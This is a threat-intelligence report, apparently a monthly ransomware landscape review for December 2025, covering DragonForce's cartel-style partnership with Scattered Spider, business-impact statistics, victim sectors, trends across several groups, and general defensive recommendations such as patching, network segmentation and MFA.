Ransomware activity is increasingly shaped by collaborative operating models in which distinct threat actors specialize in discrete phases of the attack chain. The threat actor group DragonForce exemplifies this progression by repositioning itself from a standalone ransomware-as-a-service operation into a cartel-style platform that prioritizes affiliate scale, tooling reuse, and profit-driven recruitment over bespoke malware innovation. Technical refinement—such as hardened encryption routines, abuse of vulnerable kernel drivers to disable defenses, and cross-platform payload support—demonstrates incremental maturation, while strategic reliance on partners reflects a shift toward ecosystem-based ransomware execution. The operational linkage with the threat actor group Scattered Spider illustrates how ransomware effectiveness is amplified when intrusion, persistence, and social engineering are externalized to highly capable access specialists.

ETLM Assessment:
This model signals continued movement toward modular ransomware ecosystems, where cartel operators act as infrastructure and monetization providers while trusted partners deliver initial access and reconnaissance. Future campaigns are likely to deepen cooperative arrangements, accelerate affiliate onboarding through simplified builders, and expand reliance on human-centric intrusion vectors that bypass technical controls. As defensive tooling improves against single-actor threats, ransomware groups are expected to further institutionalize partnerships that blend social engineering dominance with resilient, multi-environment encryption frameworks.

BUSINESS IMPACT ANALYSIS

Based on available public reports, approximately 31% of enterprises are compelled to halt their operations, either temporarily or permanently, in the aftermath of a ransomware onslaught. The ripple effects extend beyond operational disruptions, as detailed by additional metrics:

  • A significant 40% of affected organizations are forced into downsizing their workforce due to the financial strain caused by the attack.
  • The aftermath sees 35% of businesses experiencing turnover at the executive level, with C-suite members stepping down in the wake of the security breach.
  • The financial toll of cyber incidents is staggering, with the average cost burden to companies, irrespective of their size, estimated at around $200,000. This figure underscores the substantial economic impact of cyber threats.
  • Alarmingly, 75% of small to medium-sized enterprises (SMEs) say they would likely be unable to continue operating if they had to pay a ransom to regain access to their systems, an existential level of exposure.
  • The long-term viability of these entities is also in jeopardy, with 60% of small businesses shutting down within six months post-attack, highlighting the enduring impact of such security breaches.
  • Even in instances where ransoms are not conceded to, organizations bear significant financial weight in their recovery and remediation endeavors to restore normality and secure their systems.

EXTERNAL THREAT LANDSCAPE MANAGEMENT (ETLM) OVERVIEW

Impact Assessment
Ransomware remains a major threat to both organizations and individuals, locking critical data and demanding payment for its release. The consequences extend well beyond the ransom, often leading to costly recovery efforts, extended downtime, reputational harm, and potential regulatory fines. Such disruptions can destabilize operations and erode stakeholder trust. Addressing this growing risk demands a proactive cybersecurity posture and stronger collaboration between public and private sectors to build resilience against future attacks.

Victimology
Cybercriminals are increasingly targeting industries that manage vast amounts of sensitive data, ranging from personal and financial information to proprietary assets. Sectors such as manufacturing, real estate, healthcare, FMCG, e-commerce, finance, and technology remain high on the threat radar due to their complex and extensive digital infrastructures. Adversaries strategically exploit vulnerabilities in economically advanced regions, launching well-planned attacks designed to encrypt critical systems and extract significant ransom payments. These operations are calculated to yield maximum financial returns.

CONCLUSION

The ransomware threat landscape in December 2025 revealed a shift toward modular, access-driven, and high-impact operations. Victim numbers reached the year's peak at 801, driven by Qilin's rapid expansion and sharp gains by Safepay and Sinobi, while Cl0p's near-total pause showed how abruptly individual operators can go quiet. Tradecraft centred on control rather than payloads: Storm-0249's abuse of trusted security tooling for stealthy access, Akira's hypervisor-level encryption, Weaxor's minutes-long exploit-to-encryption chain, and Cl0p's data-theft-only extortion through enterprise file-transfer platforms. Cartel-style arrangements such as DragonForce's partnership with Scattered Spider, and the steady growth of newer groups like Nova, confirm that ransomware now operates as a service ecosystem that rapidly adapts to security countermeasures; organizations must invest in resilience accordingly.

RECOMMENDATIONS

STRATEGIC RECOMMENDATIONS:

  1. Strengthen cybersecurity measures: Invest in robust cybersecurity solutions, including advanced threat detection and prevention tools, to proactively defend against evolving ransomware threats.
  2. Employee training and awareness: Conduct regular cybersecurity training for employees to educate them about phishing, social engineering, and safe online practices to minimize the risk of ransomware infections.
  3. Incident response planning: Develop and regularly update a comprehensive incident response plan to ensure a swift and effective response in case of a ransomware attack, reducing the potential impact and downtime.

MANAGEMENT RECOMMENDATIONS:

  1. Cyber Insurance: Evaluate and consider cyber insurance policies that cover ransomware incidents to mitigate financial losses and protect the organization against potential extortion demands.
  2. Security audits: Conduct periodic security audits and assessments to identify and address potential weaknesses in the organization’s infrastructure and processes.
  3. Security governance: Establish a strong security governance framework that ensures accountability and clear responsibilities for cybersecurity across the organization.

TACTICAL RECOMMENDATIONS:

  1. Patch management: Regularly update software and systems with the latest security patches to mitigate vulnerabilities that threat actors may exploit.
  2. Network segmentation: Implement network segmentation to limit the lateral movement of ransomware within the network, isolating critical assets from potential infections.
  3. Multi-Factor authentication (MFA): Enable MFA for all privileged accounts and critical systems to add an extra layer of security against unauthorized access.